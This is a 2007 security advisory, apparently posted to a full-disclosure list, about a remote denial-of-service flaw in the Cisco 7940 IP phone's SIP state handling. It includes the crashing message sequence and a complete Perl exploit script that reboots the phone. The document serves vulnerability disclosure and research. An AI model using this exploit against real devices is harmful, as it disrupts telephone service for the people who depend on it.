MADYNES Security Advisory : stateful SIP remote DOS on Cisco 7940 Date of Discovery 3 February, 2007 ID: KIPH5 Synopsis After sending a series of three SIP messages the device reboots. The phone does not check properly the state engine in the SIP stack The vendor was informed in March 2007 and acknowledged the vulnerability. This vulnerability was identified by the Madynes research team at INRIA Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first vulnerabilities published where advanced state tracking is required. Background * SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP signalization. SIP is an ASCII based INVITE message is used to initiate and maintain a communication session. Affected devices: Cisco phone 7940 (maybe other also) running firmware P0S3-08-6-00 Impact A malicious user can remotely crash and perform a denial of service attack by sending three crafted SIP messages. Resolution Fixed software will be available from the vendor and customers following recommended best practices (ie segregating VOIP traffic from data) will be protected from malicious traffic in most situations. Credits * Humberto J. Abdelnur (Ph.D Student) * Radu State (Ph.D) * Olivier Festor (Ph.D) This vulnerability was identified by the Madynes research team at INRIA Lorraine, using the Madynes VoIP fuzzer KIPH Configuration of our device: * Current Firmware : P0S3-08-6-00 * IP-Address obtained by DHCP as 192.168.1.8 * User Name: 7940-1 Vulnerability: It is based in a sequence of messages, any of the particular messages may do any harm by itself, but all of them turn the device in an inconsistent state. The sequence is like: X ------------------------- INVITE -----------------------> Cisco X <--- 481 transaction does not exists ----- Cisco X ------------------------- OPTIONS--------------------> Cisco X <--------------------------- OK ------------------------- Cisco X <--- 481 transaction does not exists ----- Cisco X ------------------------- OPTIONS--------------------> Cisco And the device reboots. The INVITE sent has the particularity that the remote tag is already filled. The following two OPTIONS messages must to have the same Call-ID as the INVITE and the CSeq number must increment, otherwise the test does not work. Exploit: To run the exploit the file stateful-cisco-8.6.pl should be launched (assuming our configurations) as: perl stateful-cisco-8.6.pl 192.168.1.8 5060 7940-1 The script is simple and does not check if which messages are received, but just wait a second before send the next one. #!/usr/bin/perl use IO::Socket::INET; die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]); $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]); $msg = "INVITE sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDPt192.168.1.2;rport;branch=00rnFrom: <sip:gasparin@192.168.1.2>;tag=00rnTo: <sip:$ARGV[2]@$ARGV[0]>;tag=00rnCall-ID: et@192.168.1.2rnCSeq: 10 INVITErnContent-Length: 0rnrn";; $socket->send($msg); sleep(1); $msg ="OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01rnFrom: <sip:gasparin@192.168.1.2>;tag=01rnTo: <sip:$ARGV[2]@$ARGV[0]>rnCall-ID: et@192.168.1.2rnCSeq: 11 OPTIONSrnContent-Length: 0rnrn"; $socket->send($msg); sleep(1); $msg ="OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02rnFrom: <sip:gasparin@192.168.1.2>;tag=02rnTo: <sip:$ARGV[2]@$ARGV[0]>rnCall-ID: et@192.168.1.2rnCSeq: 12 OPTIONSrnContent-Length: 0rnrn"; $socket->send($msg); -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070820/f9b8ab53/attachment.html